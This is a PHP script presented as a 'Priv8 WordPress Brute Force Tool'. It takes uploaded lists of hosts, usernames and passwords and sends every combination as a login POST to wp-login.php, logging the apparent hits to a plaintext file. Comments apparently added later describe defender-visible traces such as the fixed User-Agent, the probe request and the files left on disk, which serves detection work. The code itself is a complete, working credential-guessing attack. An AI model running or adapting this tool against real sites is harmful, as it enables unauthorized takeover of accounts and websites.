Priv8 WordPress Brute Force Tool [PHP]


<?php
/*
 * Single-file web script: shows an upload form for three text files (hosts,
 * usernames, passwords) and, once submitted, submits every user/password pair
 * to /wp-login.php on each listed host, recording the pairs it treats as valid.
 *
 * What a defender can observe, taken from the code below:
 *   - On a targeted site: one request for /wp-login.php (the get_headers()
 *     probe), then a run of POSTs to /wp-login.php from the same source, each
 *     carrying rememberme=forever and testcookie=1 and the fixed MSIE 7.0
 *     User-Agent string set in login().
 *   - On the machine hosting this script: COOKIE.txt and wp_rsult.html, both
 *     opened by relative path.
 *   - All requests use plain http://, so submitted credentials cross the
 *     network unencrypted.
 * Throttling or lockout on wp-login.php (per account and per source) and a
 * second authentication factor are the controls this request pattern runs into.
 */
echo ' # Wp <form method="post" action="" enctype="multipart/form-data"> hosts : <input type="file" name="host"><br> users: <input type="file" name="user"><br> w0rd list .: <input type="file" name="pass"><br> <input type="submit" name="x" value="start ..!"> </form> ';

// Nothing past this point runs until the form is posted (the submit button is named "x").
if(!isset($_POST['x'])){ exit(); }
if (!extension_loaded('curl')) die("cURL extension required\n");

// Error output is silenced and the execution time limit removed, so a single
// request keeps running until every list entry has been processed.
error_reporting(0);
set_time_limit(0);

// Temporary paths of the three uploaded list files.
$file_host = $_FILES["host"]["tmp_name"];
$file_user = $_FILES["user"]["tmp_name"];
$file_pass = $_FILES["pass"]["tmp_name"];

$wp_crack = new wp_cracker();
$crack = $wp_crack->cracker($file_host,$file_user,$file_pass);
// The banner string below is a fixed marker in the response body of a completed run.
if($crack){die('# END Brute Forcer - S3n4t00r - Sec-w.com');}

class wp_cracker{
    /**
     * Reads the three list files and walks hosts x users x passwords.
     *
     * @param string $file_host Path to a newline-separated host list.
     * @param string $file_user Path to a newline-separated username list.
     * @param string $file_pass Path to a newline-separated password list.
     * @return bool Always true once the loops finish; a missing/empty list ends the script via die().
     */
    public function cracker($file_host,$file_user,$file_pass){
        $list_host = file_get_contents($file_host) or die ("\n WTF list host not found ?");
        $list_user = file_get_contents($file_user) or die (" \n WTF list user not found ? \n");
        $list_pass = file_get_contents($file_pass) or die (" \n WTF list pass not found ? 
\n");
        $exp_host = explode("\n",$list_host);
        $exp_user = explode("\n",$list_user);
        $exp_pass = explode("\n",$list_pass);
        // The three counts are computed but not read anywhere in this listing.
        $c_host = count($exp_host);
        $c_user = count($exp_user);
        $c_pass = count($exp_pass);
        foreach ($exp_host as $host){
            $host = str_replace('http://','',trim($host));
            // Probe request: hosts whose first status line lacks "200 OK" are skipped.
            // This shows up in the target's access log ahead of any login POST.
            $get = get_headers("http://$host/wp-login.php");
            if (!preg_match("/200 OK/",$get[0])){
                continue;
                flush(); // unreachable: follows continue
            }
            foreach($exp_user as $user) {
                flush();
                foreach($exp_pass as $pass){
                    flush();
                    $host = trim($host);
                    $user = trim($user);
                    $pass = trim($pass);
                    // Every attempt, including the candidate password, is echoed into the HTTP response.
                    echo "Testing -> $host:$user:$pass <br />";
                    $login = $this->login($host,$user,$pass);
                    if($login){echo "<b> [+] Found : $host:$user:$pass </b><br />";
                        $this->save($host,$user,$pass);
                        flush();
                    }else{continue;}
                    // NOTE(review): bare identifier statement, not a function call.
                    ob_clear ;
                    flush();
                }
                ob_clear ;
                flush();
            }
            ob_clear;
            flush();
        }
        return true;
    }

    /**
     * Sends one login POST to http://<host>/wp-login.php and classifies the response.
     *
     * Request traits visible to the receiving server: form fields log, pwd,
     * rememberme=forever, wp-submit and testcookie=1; redirects are followed;
     * the User-Agent is the fixed string below on every attempt.
     *
     * @return bool true when the response body is non-empty and does not contain
     *              the substring "ERROR"; false otherwise. Because that is the
     *              only test, entries this script records are candidates to
     *              verify during triage, not confirmed logins.
     */
    private function login($host,$user,$pass){
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS,"log=$user&pwd=$pass&rememberme=forever&wp-submit=Log In&testcookie=1");
        curl_setopt($curl, CURLOPT_URL,"http://".$host."/wp-login.php");
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
        curl_setopt($curl, CURLOPT_HEADER,0);
        curl_setopt($curl, CURLOPT_VERBOSE,0);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
        // Static User-Agent: a usable match string for log searches and WAF rules.
        curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)');
        // One cookie file, relative path, reused for every host and attempt;
        // it remains on disk next to wherever the script runs.
        curl_setopt($curl, CURLOPT_COOKIEJAR,"COOKIE.txt");
        curl_setopt($curl, CURLOPT_COOKIEFILE,"COOKIE.txt");
        $ex = curl_exec($curl);
        if($ex){
            if(!preg_match('/ERROR/',$ex)){
                curl_close($curl);
                return true;
            }
        }
        curl_close($curl);
        return false;
    }

    /**
     * Appends one "[host] - [user] - [pass) <br /><br />" record to wp_rsult.html.
     *
     * The file is opened by relative path in append mode and holds plaintext
     * credentials; the record format (including the mismatched ")" after the
     * password) is a searchable pattern when hunting for this artifact. The
     * file handle is not closed in this method.
     *
     * @return bool|null true when fwrite() reports bytes written; otherwise the
     *                   method falls through without a return value.
     */
    private function save($host,$user,$pass){
        $f = fopen('wp_rsult.html','ab');
        $w = fwrite($f,"[$host] - [$user] - [$pass) <br /><br />");
        if($w){return true;}
    }
}
